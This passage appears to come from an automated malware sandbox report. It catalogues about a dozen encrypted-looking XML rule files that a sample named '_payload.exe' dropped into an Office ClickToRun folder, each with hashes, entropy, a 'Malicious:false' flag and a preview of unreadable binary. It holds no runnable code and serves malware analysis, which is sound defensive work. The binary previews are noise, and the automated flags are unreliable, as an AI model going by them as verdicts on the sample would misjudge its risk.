                                                                                                      Preview:.<?..P.x..\..1.Q..n|{.,~.@.........7...eU.0.$.3......[sV.0w.2.0..Y...%.E`.......#..sh.."...;.Y.......,..PH...).iz...]zv..@w.a.....\.. l.n....x...G.....T.J...v..tY.K.`^......4..wy.z...j.l..l.~..|..."..a......=...uw...~.)......c,j~V....,T.iCBOr1!......g......oTZ}dx....:.Y...1.S.p.h.yqJ.x.AL).....{.*..b.....:.."{M.PQ.=D.+s..(E.yBGJ.u.....h.......K..<.[:..6u.....(#Q.w......o......y.61..4......R}Vm...\W/J..Ti....].`.V.(UC]...|.s..6gk...`7...6`;q.....`.H....<x.-W_.x...oK../3.%.M....`...H5...S......D..c$*1....l-.A...J..h.=......>T..S......M..Y..$.../...]^..0Jy....R.\..v^.r...fw.m....C.../.zI....../.M.....pL.^..C...yC.......b.........`u.O....o.......G..=x...;pyD.qw.e.j...<-8......U.k/..}y.Ov.o...>xvy..9W:...P.......oiS.....Z..=........MD....^..<.......65....1|...\;[.y.,.......A.w..4#1......./.Fo9"C..~...kax....`.....!\y.....t..uRem..W*fL=..G..6..iV.N~.....>|.....=.m...e"...+..J A@.....>d.U...a.N).H.I^t.c+.Vc....%J.......0.t.#~..p9.u.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703551v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1743
                                                                                                      Entropy (8bit):7.87197815602064
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ofby9X/+uZVE96F+/9rgaLL2gXS8zPndcOgFFJl7wD:ky9P+uU926aaLL2sS8zPndcw
                                                                                                      MD5:B3FCCA32685B78A2C2A34FC1F373C68E
                                                                                                      SHA1:BBDF7543834A8D93BFA19BE3A8A3338CADC95E3A
                                                                                                      SHA-256:6E6F127429FB72C244380CDFB6632A7EDA9D943A173CC43DEB7076F36DA9D03C
                                                                                                      SHA-512:E71BD3EBBB585D52E7024B19F2F42BDC81BA2D2E5552C225D2081A91CAAAF078BCA5E840A5C42B014315C76453A8B0680A76E1BDF0D5F324C9C610A245EBCBD3
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.9.g,IsBE.."rR...E.......$6r5.x+O.-.X/w[l~....}./....x......o....).*...l.LY.i'..PE.1...>.r.4...6?`...AY..N.n. '7....lI Qj..\...;..&.7...,.|0$..m.:..R..=.x...7_NJba.N..p.-zut..y.".Cs.BY(?.....!.FG..#...0j.M...t..4.>...../f...8...`M.O.CB......&....^.-+.....7....E....>z.V~3]/....w..+g.&.e.......*m..kWj-D.....S.S.W.8.R.d.....T........+..HG=.=..4....)6.X.+........5...@....{....6.-....~.S...\[.X-./>........uz....2......O..=0.)..,..._..........p......D...k.^....0.~.o.....!....o!.e.}..`.....3..[.....5TF....v.l...Q%Mt...-h..P...w..f..[....!..s.y^..c%....W.,..C.L.MkQ......a...k....,g..|.._9..P.......*..W.....p.[n..8<......$..gB......#.U.C..1......V.I.TW...a...T.....[...P.".....G...../..?.s."Kn!.P.x8.M.w.....p...+...M.n..u,.^9.D!.6..u.A..0sY.v.C.m.4.]....7FmCsU..Q...?X.D.K.3~..+.+.n^O.!..c.+E....=Wr..[8e.R.r.j.....q...N...ZF.w.j=.F.F......).......J.;..]...>PmL .kVy.>.........a.Su..>.~t.c...T...2......z).{..)..w...z.....?\.y...q...x...P.v.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703600v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1692
                                                                                                      Entropy (8bit):7.865202815166717
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:dQ9GOO6137/4/WlUvyRIZnKmMoCzACuwD:ucu37/xlCyRIioC0Cj
                                                                                                      MD5:58101C2020B1A4DC50B915AB53BE1462
                                                                                                      SHA1:83D3605C6DEFEB64D4266E7557BA91600369BD29
                                                                                                      SHA-256:6FCDE78E1FFBAE8C0F18316D6BF5E70F941F33BA401E0732C912D71CFD3E5C0A
                                                                                                      SHA-512:F9F42A81F9537123F419CF8391A8DBE1D559C9C5A142CD58E4FF1FE458CB2C45251C48941397C6B7CB9AB761BE066BB06C0C557DF5A05DDF2AD9346E025ACFEF
                                                                                                      Malicious:false
                                                                                                      Preview:.<?l.;\...5........C.k.L.wq0wXC.p.v........OR].,l...eo....A.P.yF.fA...5.W.T...w..41mC...J...A.8*p..............d..]...^.0..*.0.J.3m].s....iS-.;b....g4...y..{1W....0|)w...,.p..T%B.j.......JC...+il.....m.s...|.X.'......-.-Xn..D....\G:....v....kV...=.............#....j.mZ..1..%.I....l..8..d.w8.d.sD..=$]?...K.q.6y......]p$...OS..NAl...1.r....h.X...,.S..+.;.b.;.l.i....k.....K.....o.Uu...Ws......%=....b.p9;....Sh..x...W.J=........q.w...a..M.ka.K.K...j6/...]....-=7..P...".5..{ ..K.....[..].-....O...p.h..BObf....`..2....8W=...}....6.. v...~.........G.uv.....6.2..kt..........G......PEg.{..(V...F1x...Bl.>%..U...*......+Q~1?@.B...w[........".c.3..J&...wO./.pE.|...j......O.$........d.w...Z......gl.OZw.'g...n.R.]%PLe+.!.%.Cte.e..n `..B6y8.8 |......w..?O..%.\U5$.g%^:...hu.1P......#l....,.a.$.5:.....u......+a.MQ.z....}...|.j.q.$.....MY..U,..g.7w..47n].,.r.../\.:_.:.n.,mQ.FNR~b I.D.....z@..}... Oh...8......(A.b#....wsR...Ij..v.61

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703601v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1729
                                                                                                      Entropy (8bit):7.892522629525096
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cp5hNvlG9/Jq9cgNsBShRf8PCgG46dD50/H/hzswD:2VvlGlKLhR6C1Jin11
                                                                                                      MD5:E6E5D4B28DD20C3032F84BD836B017FF
                                                                                                      SHA1:295C746A0A347D0F10EAF2B1057439895659589E
                                                                                                      SHA-256:3A5BEAE9D013C0503525ABA7310043073C4BFBB60F7F12FC4F77DA2266AFEF39
                                                                                                      SHA-512:84FC9588EFF6BE4C3BAF17D97A9DBFEE87778C28EAE24AFCAD056E5D4CEDFF7BCE41F8C7014A7BAAE05A58D458490D1EA235562792DA5F98F98D218122C393EC
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.a.Vo..R.H..BC}...M...._y!.&........-.../....gy..v`..m....s......}..!}G.!..T...c.......P..'.-....Tf............_...<..ZDx..r.....mC..*.........^ ..<..q.>..F..-...k;.H.C...S ..S..m.]....=~++....u'N. .s.5....~...,.I..%2..Sm.pa...k..{S..E..[}..d.I...n....$.?{.%{.....f.....6g.....'.L....[..%Te. .`..d..&..r.>(.....jo.a...|XnU.~G.....R..............\d...c..7......t.:y....^I..;......^..w.I/..$"*C...,M{V@`......Q..Z.Vk-..Y..8G)..Bto~q........\..(..tU.@....I....<Y..1..8...P9..(..,..v.Dm..e... osS/..qE.k...#Y.l...&Oz]%.x^...[..JY.W....m.\zE.e.8U.J.....F....mt.=y..a.U...D..f..t....S..N/.R...E%a..rN.9.>ng.._.O....J['..9..G;v.._9$HD.daO............."N0."pR=Fo..E..Jxi......w...a.....Wo.q...lR.._.0i".^.....CmA.&ah#.(y...!.$.&.E.F..5^X<.....jX.....Q.78...9>...y..,'Pi..]..~.......4.$E.[......b5.80.x.....V......".1..q_........;...V.f..1..P,....=kN..e.....T5.$x.!9..R....t.O......t....!%.....m.R{.I....*.y..."\<.Y..s\....3.:/e..F...UV..s...U...c#.u....t9

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703650v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1694
                                                                                                      Entropy (8bit):7.891311607450489
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:gKODzGxK1k0uIoA5GCKywP+L+mwKUyeZwD:gZDzGY1kZlAZXAFK
                                                                                                      MD5:BBC4C3A798FF77C92C2C44842916F933
                                                                                                      SHA1:475D6B45CFACE3D5FD048E2AF9088ED968E202FF
                                                                                                      SHA-256:889DB49AF2309D4FA2E869B62AD0ED1C63B486260A2F10DF002B7F5D041D3876
                                                                                                      SHA-512:91B7BE2049C86D798408619F22A05727A75B026B79E5046178967EA39E6805AA05B68E86E6E6D94D8757B5DCFC83420C11EB31FE1D345285A7F5E1A0C0D36EA1
                                                                                                      Malicious:false
                                                                                                      Preview:.<?........./N.+.J..../.$ew....T.8..0...N.[....]+1.*..4....1r......K.4....].'i...P8......s...\D.+.u{1..2J.4.q_.:.p.8yc..Z~l.|.=..>y,.U..).%34..=*5.C.|.E.kV.(].bcq.O4..<...../9.EJ"..c.mo.'DwY..C......C...r...b..G...E]..D...-Z.r5V.! `.#|...3$;i:..e......j..d.cr.S././..b.]b.Kz..y .r.).-}>..K..sV..0.j..r.0.............0.....P....9.1)7ymA....H_.....`....].....j..N....Q.F..8..y.p..`...J..V...9.O.47>...x.......?..d'..I.......b.5B.....q..d.:.I...@9e6.g.........O:..^d...T[.R9PT.....y......x.Q..O#Z*e>.K.=$..Y..JG.....@.D..]r.T.7....g..i. J.}......)...IL.$.]*.fO..%X........*e..X.*...........BI@.V3$.C..F.U.g..?..?K.A.7..^!..X...^.{.q...........'R.8($5R.!..r.o:l...|;.....49q....H....o...<.BwCf.Zj.(^*.../t...@+..b..f..v..=E..?....Zc..,..,..F.D.l.].l9.fZ.;;.;.......Uu..<.6.....>...M............t#..J;.:8.C};.,j...i...u.&......jU(..?-.I0...P...T..?S...%.za..@~....X6.....m........L,F^.(.Q...p.....4....Jj.*h...o..'.......j._......{.$.I.k...J.@.M..B#.....R..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703651v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1731
                                                                                                      Entropy (8bit):7.8731680832636215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:mv88gX21UQm08BmXScSwuWrIBuDznAldYp01wD:t8gdc8IXSc53rDDzAcr
                                                                                                      MD5:ACBB6ECE65E7D1D25C05BF7A294458C6
                                                                                                      SHA1:2FD2A4B26500D10A6104A3FC8E33E0CDB26D38C6
                                                                                                      SHA-256:03646000C4B064CC9FFF581B2D61896EC0E7448F7C8A6317683AD90EF36DA5EE
                                                                                                      SHA-512:3C988F9171A3BB18B4A356411C49C98AD0E5EC528C5BC3DFE36F92F7D681C54D1D50F6FE9EC7E868E4288B34825C786B6E58D36E30A14C7082BEB90008800230
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.Sm!..M.....*.k..<...s...r.3..wxb.........#S.6cC.Z..[9.,....h.RYx..D.y.P!6..Hg.`....u....B...I.m......?..A..7.Rx....0...\..g.W..c..C...y_....E......i=.2...*%h.0....g...H.}.en.\.Y..m#K......F...)V.u}>p....f.W.1].>....qDL0.......J.....)3..........\B...C.}.4...~.$g...J.i&....p1......FZ.&}..].*..A. .T..4....B.....({...zz.8B4..w..Q... ...O.....z.^$...pd5....u./.&..d.k.....".8*,}T..!.&....t.,.....]n...oC...(k5]..Pl1-_.8`....y.....n..N//1.O[....D...d.X..X..mpE.o.*?....d.F..a.c...J...}..|.Ed...>&....\K._.quv-h....Jk...l....e..,...!.~...0E....EL.. ].6..t...=.,be+..h....c.L!......{.!F.(*..^+>.@.Zj...sY..e.vf.~.e.D.t\.g...~H...^j.=.,.@......z.^.<..%......Y.8.0..8..rS..$....P..E-JfJ.'.g.......l.(tf0j.......?{.u.<....(....!..Q....B...F.D0..13........h.|:.....g..M..E..C...k.k...z8.......{.3.^.... ~.O..4..2....a.:.(w..0..n....*.;~.7..F.k.R..W.....Q#....,x.S#N$s.l......[.;...xL."...@............t=.c.......B.%P7x,(g..D.K.b...Hky..?..-D..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703700v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1712
                                                                                                      Entropy (8bit):7.881445524300525
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nDz4mjPEQ+XUtFRmSKKgDzKrE5H3oAWnHUXIwD:nDVjPEQNlmCLrEIHUh
                                                                                                      MD5:2F581A50586D4BA3C937915FDB44D16F
                                                                                                      SHA1:B2F122C5875E3506A585BCEDAF7A180AA48947FA
                                                                                                      SHA-256:0F0F7A4398D30EF9A9C8F17CD3BDAF1296232BCE31F8759861A1451E61184641
                                                                                                      SHA-512:5AA10AFB40F2B6A22EEB9DEA28A99D93E4265FC7C6AEACE2F4B7756B87A2C2D3C6A2F4B2ED24F8180EF3B5E488F37CB4D5EB29529260891147902374FE7E800F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?:.u.N..O.9.m..gU.5k...|..,V.@.RH...b.......R.a..X...L?.. .....t...+)x.Ov...U"........P.\....e...<.....T.(...)j.[.0...)?c...F.JD..a<..Fv..7...bS..;x..0..{K.J..7.O@..\..5.Q.v.x,*.rC.........|.1...Mlq......J.h.zM.....u..ZzH...x.6.._....Z.+.....8~......R.|.,aq...mrn.#.)|..T.3fX..7.u/...mP..s.v..3...R.....n..d.#...a...Y...b..f{9S.'8.....G.,.....r.lb...}c.N..7qq~.?.]K..5;;....L.. .Q...s....$..+.*....V..}...Xn.t5...{Q..j.....j..uA.S.!......).....UiI%......#.........[....c..N{|d...8z..........^'.0J.(...&}..m.8kS.D.5....."z>\.{.PX[fC-v.l..3..0....F.?...H^....>.^qA:x.l...6...B.wB..+!...Q....JX.T:.^...I.#..b.q!Ab....p,.Nrk....`..*..........`..&.?Mz:.o!A._f.G+3.P....c......h..G...c...xv.......G..8.s....9..I.{>KS.$......L?.........Zj:.n..o.U,Cw,....,..2.6.J.9.^j.n7~}....L...E.._.|.m..4yxi.....M.W.H...WZ..b....5]......Z..9'b/8.....4@O.c....5Z.?H(............F......fYe....l.VR..-T.HN.0h...z...S..........F...O.NZ.h.<.|".....i?T.......+4w..+]{..A...]to

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703701v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1749
                                                                                                      Entropy (8bit):7.891023525070839
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:K8tEU07gSBd049F/o1vMrlL010fLt/H27QwD:9qnLG4LJ5/H2F
                                                                                                      MD5:ECCE1B55C3A9FB4107C2E4119C7DB998
                                                                                                      SHA1:774B9D521D8D2C1B04710413DB888FCD3C3BD64D
                                                                                                      SHA-256:E53B21A62ED287B6AEC47D32E1745A43E6639B856E08D2AEC54E0A6077FE3E6D
                                                                                                      SHA-512:F5BA296F8C1F234C317D83E7AF7CBEF4908B410FB42881E4000B76E80B21EEF5D1D064E705506DA25D4B78D6761A2A053CF03D25E66F626D09433A266FC815C1
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..dv.j..}..ok...E.....D.).....\....`....3..&_.p..s..|p...s.}._W.........}........Yi..sV'....y.?.?z.+..{............V...m........-l..R.b.&.........%:#..{g....G.....V(.`.*..Xx....|...N.!....1^L...\+M\2.3)Qs..L.].1..V-..K..'.W.....O..~J^...ZE.}Z..g.......5lN.*>...x..d..U........zS.3........0.0..s.9T.o8....i...7...ML...(t_Eg.p....1.l.8K..b.~....^vQF.hf....[U......q.M..PE...!..#.....kw M..n..@.6f.:...$.J....l....{N ...}...$........d.J...R..+RO-....&;..M.......<.mC.....+rGm.t.]...L`n.}.?..}.K.V...Q.M.:...{..._M=.N...1.0...>.cJ.H......)...'.n .zE_.@~.u!.._z'...&{%./..%dM.X...2G.\,.W..n.\._V.<8....p.R....1...@:Y=L.x.T...e..C.u.l.a.j.<U.q.i[.......o..l.I*x8.?...$...WM..........]x?...9...P&(..|..:....c.... .cn3r{o..n..7?.....,...+B.D.ier..-.a..260.9..^..#".T..=....}q........dI..%R.x.$..Q....xO.S.@?,).,.w..~|s>A.,x.....b..=.....L...L...b...\.cZD..3.k C..F.j.....t......R3..5Fu..V.K....IGx...i...](9..8+......."...].T..h98S.f.Wr....3....o

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703750v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.897466037382371
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:VUpKI1sKHMZqnAsc4sMyQrib9uh7mwLKzmwD:VyK8M4nAsEhQriohYP
                                                                                                      MD5:5C3277C3AA7517AF6D870122884934C1
                                                                                                      SHA1:7AF0F78EB93D9C01B669E755B3A8C2D1AFCC7ABD
                                                                                                      SHA-256:DF66603BE3E33FDA6438359ECCB8FF04665DAB9A6E4DAD98D5E9D168DF92299F
                                                                                                      SHA-512:069CDBA677F0C2454055095ED011DA13566CB46909DADEBCAFD747EA283CD3E0AA738E4AC3FBEE5C3AB8A46157A3D4914D66857C8BECE7B5CB6720FDC0EBEE8F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..]....N.._......:..]l.4Ul.S...Cp..,`.......S...T....=j....v..W.>.........X........#tTTTi|x.....Z>..7..I.+..F....?..........M...y.=......3m.x7\^.L.\.4%...s_.,....D.%3.z...X...z...W...=.cn......^..l...P&.Z..e...D.K..Y&....1.B.....M..F.d..._..5|..-..a.....\.O0.H...w....<+t...ib35.X.......6M.F..3..i..~_./..n.;...<=.X<...)..T...$.l..D.[.~.#.u1..;I....\.F..PBp.A6.[.>O.je.06w@A[.@....[y......#.O\...R`..C..Q...HF...z.....r..s=.S..H.!.H..Q.......M.}.'...LV..[..34....o.E.W.~............M_.y.4..M,U=gK.N...5...C.. A.....C...... .?!p.Q...gZ.@..nBu4.Q....V.G<..`.W.%....&..*.w.\.y..T.>.T.(.~+x.......7G.J.:.~..,...1g.....W..V..?.n.M.W.....ve.......F.r........^....N^J....5..c..k9.......``.^+N.......!B`..9.].7.=w.b.Y...e........CFw8..YI.....0..f..k.........20=..4.l+x..5..x..t...$.R.kz....I O(.2]y...#.....i..$W.=.....J&...)&....v..6K2.(.K.......M.[..gs..sN...dE2.rJ..T....B..K.+.\.)6H..T?.`.:)6.`.].Y....4..9q..f.._...e+.mn..6J.).~.j....[.:rB:....../.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703751v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1771
                                                                                                      Entropy (8bit):7.895778993111872
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+Dw1YFSd0aS+NgRT73Lmm5QlXxCjdxEcV9etm3wD:+s2Fi0aDKT7slX4TE7k8
                                                                                                      MD5:03969DC25E686F91A42AB01627A68FDE
                                                                                                      SHA1:FB7E9CC8AA990BB46A019BA625A04555B6352F50
                                                                                                      SHA-256:F38DA15BC576308241858718C1B241B503B72775994985FD4FAC7844D2291E56
                                                                                                      SHA-512:14A0604A699BF97644FD5B3C8053CEE0B4A06987F2C846AD80A4BCEAE60F83738FB5A3732E13C6C61F1281AB5B6F60457F4AB13B131630FB32052992D0211FCB
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...YW...4)ZiQ......._<....5.\...r-..p.kV..1....fC....7W.'..+WA-.....F."R.`.F...74..4..p..R....l..5OE....d<..5.u=.S....w..".y.rZ....Gi.SS.t....7.n."T&.@.{rU..G..v.5..s.T.m.^h.);.5..\...1.:Sfs;..L.T.|.6..=.T...o..F..G..t.J/[dK....]hVtMu...c..&...[.9.:....S.c|..o.@...6.[.>...*C[+L..u..".P..&.wB.=.tE=...@...*2....5..M.......Y.9....I....5. 5.Wv...`....u1...f....].V09.=/VK...T^...O.h.....)^.Jt..&.N..j(.^|"lY..s....../..u.B..g..~.....S...Y.....5>..+."..1..oQ.....H...g0n..1.P@R_xe..Bx..5..a.....*BM...\r......r>.._....6.e.#...;....eN......]F..........].._.....{...q........R..aO..Q5*....b.kn.$=.....C..d..../...s7...,.r.>....n.C.&.....=.f..p`El.m....6...=hh.CC..",/.{1.L.)X..M..-.f^....."....{....z..CP.'bB,.R.K.j2...Soa|.......b...8..e.....k..G..B..L3..EouL........f....[....E.....?...(;..r.....O$].....<(.a.K."...H`.......D&.&.`X-....U..1..S.....6...sG@..k..t.X.\7.".v..N.6.(......s.q......2........(...@.;u..q.}...bec...XT#...:.+.:\.F

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703800v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.883789854517457
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:iVkgDgSUcWHQUhY9eUTPqnmJR1yK1GpF0oA89hrFOJ1wD:iVkgD9+PgPqnmxmpF0l6xFO8
                                                                                                      MD5:707B3612B43FE828FBB049A8984A135C
                                                                                                      SHA1:9F9D0C3C184AACA589288635C4BF7E3537122813
                                                                                                      SHA-256:DCE1AE73FFC1821CF58ED20C772B1BEB7A02D973F1D36EF044989E319B02429B
                                                                                                      SHA-512:BC93792137E3FEBF70341647EF1F10434F2DCAB9FD0051282EF2186B67ECD13713350A6508EA92D95A0DD82E520814C4CF647F3A1A0BC975552A8624EE1F1C9C
                                                                                                      Malicious:false
                                                                                                      Preview:.<?....j.Z.L.}Rt...a.!..J..lt. ....C..4l..T...t.'..\.Rm........z..L)........[.V.oU...Uh..A..+.Q..;.0.....*AZq.h.......|p.@...|............(.......xE.*E..1.:...=uf.B.]....%..>..?n.7........}&.A...Rf.!/.b...c..(.o......f..B....)..... >....p.$..<!..P..Z........*....XH...-:9..9<.v...X.u.y.~..".....a....Rmp~yq~.o.o.N.......4..W.N....{.!M+h..QGr..z~R......A..n;1|......Z...e.="....;Y...........!n,.UZv...y.$"...u-4.a......j.xg.&.pT......s..7W.1..6B...I........G.ga=D......,.......e.....)....'.~S....?.4......X!.7.B...2g'4..I.O.......z:...s.$as...T..H?*........{.v7.........<...a..V.f.~.s.&....E..6y.G%w....Y.6..6.....Y..9Nm.....GF..,..,.%.....b}..9./[a..yy..1n..d|SK...`.]e..6W..6n.e@....?.8..Pb.:...i.....p..0...w...}......+Og...3..Fp..y./m\.....ll.....Lo........Z.N.r.e..6._l.Q-_.P.z..Hu]j....G..)...s..>3.........1#._.S...3...s...V..!.|$Y.B.nz...Qd.fLo....%biaC...".....@].tt&.g...S...K'.=+.L...3..QC%..P].#..C..7......./.6..).{u'gNa.a.=..f.......<

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703801v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1753
                                                                                                      Entropy (8bit):7.908077400379561
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:zQH6GIciktrZDrYdTHNJgfa8kvNxB2ZwD:zQaXcisZI1bMAHBh
                                                                                                      MD5:04C63D88E76F909D2B84087E5AC68877
                                                                                                      SHA1:0A98F940060AFDFBF55D5CD1FCC3F63F755001DF
                                                                                                      SHA-256:A9CC73D9992398F35AEA47C2F8A8F898ACF6C11D8DBBF6F1698A8237CACF6D8D
                                                                                                      SHA-512:1E7C10CD6A3ABA7DE791265840007C37FEE5421FC042E5EB9E971728D22977BEA137A9A6D4C1BE966EEFF68EFBB7D52C86CF12C6FD3517F51945FB3493AFD00A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.....w..L0.P........p....&.V..)$.......`.y.)..!4y.7....*..,....'r..R.\s@x....k...[..r2...o.....].......(..\...}.'k.]....[i.j.z>.B..g..9QX...I..a.....`.s...}q...!....&c`...P.;w#....9/....;eL....g.bx..Pi.S../.../..0.NY...........`.%.....u.?..T1.....QX*..n..........@._.EDI...^.)..O.:-I..9.o.|.u.4s......Y...._.v46..&...Z.s#2....B....WK$f..{....d9,\M.d.6.Dz.F....k.h.....2...;.,{..@`......_.....u..j.#../lckZI..F1&..E\.....1p..B.I."Z..%..[..=.....tEe...5+......;.....;...Y.p...P.hh8..._E....x..[?js+...$.g.t......P...*.LN...6..Um&..Z..8....8...:..V..... `1@.*.oa..k.<....c.uG... .[..%..{I..]..a^...*2.~w.w.Ek.[K..>.d....\X.S..i...*.(..2b*6..\1....r...qqOx..'....rM..^Z..i.`1,..R./.>....>ND.._.'..I\.}l....|3....UI*i.e...V.+...x.....X-....x...|I0..k.C...v.%{.'..V....t@...ue.B!...-.O..f..7..wMO\7......._...."....1...|.bru]..k......La^...&..{..d.@...BI.V....)....vA.&o..]....}2:`.uU..q.{N.. ....C{...#.;.=.m..Y.|s...E@.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703850v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1739
                                                                                                      Entropy (8bit):7.883880175749919
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:SJRpKV9mYzPKCO6a+CCnjGIclPmq/LjuszRSvSwD:qTK5R/a+yd/nNzgf
                                                                                                      MD5:AB75427AEF7A0259CDE9D76052B1B192
                                                                                                      SHA1:9011F194FD61F9186DB2C3A80979BCB5C3461FB2
                                                                                                      SHA-256:81B76B7E9004E463B672882542995CA025704C0E73E3C23819E8B075A869413D
                                                                                                      SHA-512:53B013CD1E750421435F071BE08BE97A615433449F5EBD4CCAD478F5ED4B8CEA9F9D8515A059E5F4A4A52755B9BDB97FCA61A6931AD579267A5ADCF2A2393A6C
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.h,9.j..]../..u.`.A.U.$.5H .-.,q,.v...es..zN!Z..~.'+....e.7D..r....R9..%;.>V.?[....\...9a.f.:W.G.S;..f.......U!Y7..s[.>...*...S....Q.6<.uc>A..`...".X..#.../.......?Km~..".rTq...p...S....0....Y.%p N.z......2!..j.....N.vE....78.Hzu6d.7..V.....+.P....#E.oz....b...K.p.H.Vlz..u.*..L...2se.*[+.0.^...W.....O....Ce...j.u..-..W3.D .....+......z.S...&.0kx.b...h..@.k~.\i.~.;....... ..?....+...j.....L&.R...eE..........#-..../....a.R...#,...w.1.......#4..%h..?..a....`Uf..+..,......M.g......^.&.IE..{L0Do..>..B...JK:.......M...(..).AZb7......>...(pq..8....'VM*.'...[...1......O..Q....._.6...P...Q...Y....I$....<..u.GK...VU.....s.X%....MXr......4...C..x.8h.....^.:..@.....^'w..FT9..%a.C..V..Z$3....k. {.v.ulR{..Ezk.x#....x).g..:.."GGR.........~'1..+..J:L~J........h....K..j......G*..?xv..B......H.W....^..e.w.].'......66i>f...0..x,..D...t+".......3.hi....3.e7.F..9.i.\.....d..QC99i#r+j.L..L0... ..qO..*k..x....N..n7.:......P..X.u.R.g..O]T]............q

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703851v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1776
                                                                                                      Entropy (8bit):7.890471482058067
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvpye+WIt5/530n9UfifhGWIpUUOg0z+N1hLk06LwD:Gpye+WIt5h30n9Ui8UUb0yNXLx
                                                                                                      MD5:42A941757683400B1A6B3997875EAF15
